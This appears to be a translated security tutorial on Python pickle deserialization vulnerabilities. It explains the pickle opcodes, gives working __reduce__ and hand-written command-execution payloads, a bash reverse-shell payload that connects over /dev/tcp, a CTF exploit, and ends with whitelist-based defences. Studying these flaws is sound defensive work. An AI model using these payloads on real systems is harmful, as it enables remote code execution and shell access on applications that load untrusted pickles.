Python pickle deserialization vulnerability

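0x00 pickle: Python's object serialization library

Introduction

Like other languages, Python has its own serialization/deserialization mechanisms.

The three main serialization modules in Python are pickle, marshal, and json.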

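pickle library: https://docs.python.org/zh-cn/3/library/pickle.html

  • The marshal module is more primitive; pickle is generally the preferred way to serialize Python objects.
  • JSON is a text format and is human-readable. pickle is a binary format and is not.
  • JSON can only serialize a subset of Python's built-in types and cannot represent custom classes. pickle can represent a very large number of Python types, including user-defined classes.
  • JSON is interoperable with other languages, whereas pickle is specific to Python.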
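
The difference in type coverage can be checked with a small sketch. A standard-library class (datetime.date) stands in for a user-defined class here, and the variable names are purely illustrative:

```python
import datetime
import json
import pickle

# A standard-library class stands in for a user-defined one here.
value = {"when": datetime.date(2019, 9, 1), "z": complex(1, 2)}

try:
    json.dumps(value)
    json_ok = True
except TypeError:
    # json has no default encoding for date or complex objects.
    json_ok = False

# pickle round-trips the same structure without extra code.
restored = pickle.loads(pickle.dumps(value))
print(json_ok, restored == value)
```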

Usage

Serialization

Write the pickle to a file object:
pickle.dump(obj, file, protocol=None, *, fix_imports=True)

Return the pickle as a bytes object:
pickle.dumps(obj, protocol=None, *, fix_imports=True)

Deserialization

Read a pickled object from a file object:
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict")

Read a pickled object from a bytes object:
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict")
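
A minimal round trip through both pairs of functions might look like the following. An in-memory io.BytesIO buffer is used in place of a real file, and the sample data is made up for illustration:

```python
import io
import pickle

data = {"name": "pickle", "versions": [2, 3], "nested": (1.5, None, True)}

# bytes in, object out
blob = pickle.dumps(data)
from_bytes = pickle.loads(blob)

# file object in, object out (BytesIO stands in for an opened binary file)
buffer = io.BytesIO()
pickle.dump(data, buffer)
buffer.seek(0)
from_file = pickle.load(buffer)

print(type(blob).__name__, from_bytes == data, from_file == data)
```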

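Protocol (data stream format)

As of Python 3.7 there are five pickling protocols (versions 0 to 4); Python 3.8 added protocol 5. The higher the protocol version, the more recent the Python version needed to read the resulting pickle.

Only protocol 0 output is human-readable; every later protocol contains non-printable bytes.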
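
To see the difference between protocols, the same object can be dumped with each available one. This is only a sketch: "readable" is taken here to mean printable ASCII plus newlines, and the sample object is arbitrary:

```python
import pickle

obj = ["pickle", 1]
readable = {}
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    blob = pickle.dumps(obj, protocol=proto)
    # "Readable" here means printable ASCII plus newlines only.
    readable[proto] = all(32 <= b < 127 or b == 10 for b in blob)
    print(proto, readable[proto], blob)
```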

pickletools

A standard-library tool for analysing (disassembling) pickled data.
[screenshot: mLQ2rt.png]
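
As a rough illustration, pickletools.dis can print an opcode listing for any pickle. The tuple being pickled is an arbitrary example, and the output is captured in a StringIO only so it can be inspected afterwards:

```python
import io
import pickle
import pickletools

blob = pickle.dumps(("id", 1), protocol=0)

# dis() writes a symbolic disassembly; capture it instead of printing directly.
out = io.StringIO()
pickletools.dis(blob, out=out)
listing = out.getvalue()
print(listing)
```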

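0x01 Python deserialization vulnerability

The __reduce__ method

https://docs.python.org/zh-cn/3.7/library/pickle.html#object.__reduce__

When a class defines __reduce__, pickle calls it at serialization time and its return value completely replaces the default description of the object being pickled.

  • If it returns a string, the string is treated as the name of a global object; that object is looked up and pickled by reference.
  • If it returns a tuple (two to five items), the first item is a callable, the second is the tuple of arguments for that callable, and the remaining three are optional.

The second form is what is used here to build a command-execution payload: the callable is invoked with the given arguments when the data is unpickled.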

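import pickle
import os

class A(object):
    def __reduce__(self):
        # (callable, args): os.system('id') runs when the pickle is loaded
        return (os.system, ('id',))

p = pickle.dumps(A())
print([p])
# Unpickling executes the command and returns its exit status
print(pickle.loads(p))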

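In Python 2 the class must inherit from object (be a new-style class) for __reduce__ to be used; in Python 3 every class is new-style, so this is not needed.

Without inheriting from object:
[screenshot: mLGzvQ.png]

Inheriting from object:
[screenshot: mLGxgg.png]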
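
A harmless Python 3 variant makes the mechanism easier to observe. The class name Replaced and the choice of sorted as the callable are assumptions made only for this sketch; the point is that the pickle stores the callable and its arguments, not the instance:

```python
import pickle

class Replaced:
    # Hypothetical class: its pickle is just "call sorted([3, 1, 2])".
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

blob = pickle.dumps(Replaced(), protocol=0)
result = pickle.loads(blob)

print(blob)    # mentions sorted, never the class itself
print(result)  # the return value of the call, not a Replaced instance
```

Swapping sorted for something like os.system is exactly what turns this behaviour into code execution.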

Useful functions

eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads,cPickle.load,cPickle.loads,
subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
commands.getstatusoutput,commands.getoutput,commands.getstatus,
glob.glob,
linecache.getline,
shutil.copyfileobj,shutil.copyfile,shutil.copy,shutil.copy2,shutil.move,shutil.make_archive,
dircache.listdir,dircache.opendir,
io.open,
popen2.popen2,popen2.popen3,popen2.popen4,
timeit.timeit,timeit.repeat,
sys.call_tracing,
code.interact,code.compile_command,codeop.compile_command,
pty.spawn,
posixfile.open,posixfile.fileopen,
platform.popen

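The input function

In Python 2, input() evaluates whatever it reads as a Python expression (it is equivalent to eval(raw_input())), so it can be used to execute code.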

daolgts@DESKTOP-4DDBUKG:~$ python
Python 2.7.15+ (default, Nov 27 2018, 23:36:35)
[GCC 7.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> input("")
__import__('os').system('id')
uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
0

payload:

# Python 2 only (uses __builtin__, StringIO and input())
import pickle

# Reverse shell
a='''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''

# Replace ***** with a custom command
a='''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('*****')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''

pickle.loads(a)

Constructing arbitrary functions

https://checkoway.net/musings/pickle/

types.FunctionType combined with marshal.loads

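# Python 2 only: relies on func_code, __builtin__ and 'string-escape'.
# Each payload rebuilds foo from its marshalled code object and calls it:
#   types.FunctionType(marshal.loads(<code bytes>), globals(), '')()
import base64
import marshal
import pickle

def foo():
    import os
    os.system('whoami')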

payload1="""ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))

print [payload1]
pickle.loads(payload1)

payload2="""ctypes
FunctionType
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')

print [payload2]
pickle.loads(payload2)

new.function combined with marshal.loads

# Python 2 only: the new module was removed in Python 3.
import base64
import marshal
import pickle

def foo():
    import os
    # os.system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')
    os.system('whoami')

payload1="""cnew
function
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))

print [payload1]
pickle.loads(payload1)


payload2="""cnew
function
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')

print [payload2]
pickle.loads(payload2)

Class objects (new.classobj)

payload:

payload=pickle.dumps(new.classobj('system', (), {'__getinitargs__':lambda self,arg=('id',):arg, '__module__': 'os'})())
>>> import new
>>> payload=pickle.dumps(new.classobj('system', (), {'__getinitargs__':lambda self,arg=('id',):arg, '__module__': 'os'})())
>>> payload
"(S'id'\np1\nios\nsystem\np2\n(dp3\nb."
>>> pickle.loads(payload)
uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
0

Hand-crafting pickle code

As mentioned earlier, pickle code is readable with protocol 0, so it can also be written by hand.

https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#pickle-code

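c: imports a module and an object; the module name and the object name are each terminated by a newline. (The find_class check happens at this step. In other words, as long as the arguments of the c opcode are not restricted by find_class, objects obtained in any other way are not affected by the sandbox, which is why the referenced write-up uses getattr to obtain objects.)

(: pushes a mark onto the stack, indicating where a tuple starts

t: starting from the top of the stack, finds the topmost ( mark, pops everything between ( and t, builds a tuple from it, and pushes that tuple onto the stack

R: pops an argument tuple and the callable beneath it from the stack, calls the callable with the tuple as its argument list, and pushes the return value onto the stack

p: stores the element on top of the stack in the memo; the number following p is that element's index in the memo

V, S: push a string onto the stack (V takes a Unicode string, S a quoted string)

.: marks the end of the pickle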
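
Putting these opcodes together, a tiny pickle can be written by hand. The sketch below targets Python 3 and deliberately calls a harmless built-in (len) instead of a command runner; the byte string is an illustrative example, not taken from the referenced write-up:

```python
import pickle
import pickletools

# c  -> GLOBAL  builtins.len
# (  -> MARK
# S  -> STRING  'abc'
# t  -> TUPLE   ('abc',)
# R  -> REDUCE  len('abc')
# .  -> STOP
handmade = b"cbuiltins\nlen\n(S'abc'\ntR."

pickletools.dis(handmade)          # prints the opcode listing
value = pickle.loads(handmade)     # runs len('abc') during loading
print(value)
```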

anapickle

Toolset for writing shellcode in Python’s Pickle language and for manipulating pickles to inject shellcode.

https://github.com/sensepost/anapickle

0x02 CTF challenges

code-breaking picklecode

https://github.com/phith0n/code-breaking/tree/master/2018/picklecode

Write-up: https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#

SUCTF2019 guess_game

https://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_game

Write-up: https://github.com/rmb122/suctf2019_guess_game/tree/master/writeup

exp:

exp = b'''cguess_game
game
}S"win_count"
I10
sS"round_count"
I9
sbcguess_game.Ticket\nTicket\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00numberq\x03K\x01sb.'''

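0x03 Defense

Restricting Globals

Follow the officially recommended approach: override Unpickler.find_class() and use a whitelist to restrict which objects deserialization may import.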

https://docs.python.org/3.7/library/pickle.html#pickle-restrict

import builtins
import io
import pickle

safe_builtins = {
    'range',
    'complex',
    'set',
    'frozenset',
    'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()
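
How such an unpickler behaves can be sketched with a self-contained variant. The names ALLOWED_GLOBALS, AllowlistUnpickler and allowlist_loads are hypothetical, and the allowlist of (module, name) pairs is a design assumption rather than the documentation's exact code:

```python
import io
import pickle

# Hypothetical allowlist of (module, name) pairs; adjust to the application.
ALLOWED_GLOBALS = {("builtins", "range"), ("builtins", "set")}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only globals that are explicitly allowed.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))

def allowlist_loads(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()

# Benign data that only needs builtins.range loads normally.
ok = allowlist_loads(pickle.dumps([1, 2, range(3)]))

# A hand-written payload referencing os.system is rejected before any call.
try:
    allowlist_loads(b"cos\nsystem\n(S'id'\ntR.")
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(ok, blocked)
```

Keying the allowlist on both module and name avoids accepting a same-named object from an unexpected module.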

pickleFilter

https://github.com/Qianlitp/pickleFilter/

It adds a decorator to the load_reduce function to intercept untrusted callables, which to some extent reduces the damage caused by pickle deserialization flaws.
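
The general idea can be sketched as follows. This is not pickleFilter's actual code: it is an assumption-laden illustration that relies on CPython's private pure-Python pickle._Unpickler and its dispatch table, and the names TRUSTED_CALLABLES, guard_reduce, GuardedUnpickler and guarded_loads are hypothetical:

```python
import io
import pickle

# Hypothetical allowlist of callables that REDUCE may invoke.
TRUSTED_CALLABLES = (len, range)

def guard_reduce(load_reduce):
    """Decorator: inspect the callable on the stack before REDUCE runs it."""
    def wrapper(unpickler):
        func = unpickler.stack[-2]  # stack is [..., callable, args]
        if not any(func is trusted for trusted in TRUSTED_CALLABLES):
            raise pickle.UnpicklingError("untrusted callable: %r" % (func,))
        return load_reduce(unpickler)
    return wrapper

class GuardedUnpickler(pickle._Unpickler):  # private CPython class (assumption)
    # Copy the dispatch table so the stock unpickler is left untouched.
    dispatch = dict(pickle._Unpickler.dispatch)
    dispatch[pickle.REDUCE[0]] = guard_reduce(pickle._Unpickler.load_reduce)

def guarded_loads(data):
    return GuardedUnpickler(io.BytesIO(data)).load()

allowed = guarded_loads(b"cbuiltins\nlen\n(S'abc'\ntR.")

try:
    guarded_loads(b"cbuiltins\neval\n(S'1+1'\ntR.")
    rejected = False
except pickle.UnpicklingError:
    rejected = True

print(allowed, rejected)
```

Guarding REDUCE alone is a partial measure, since other opcodes can also trigger calls, which matches the "to some extent" wording above.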

0x04 References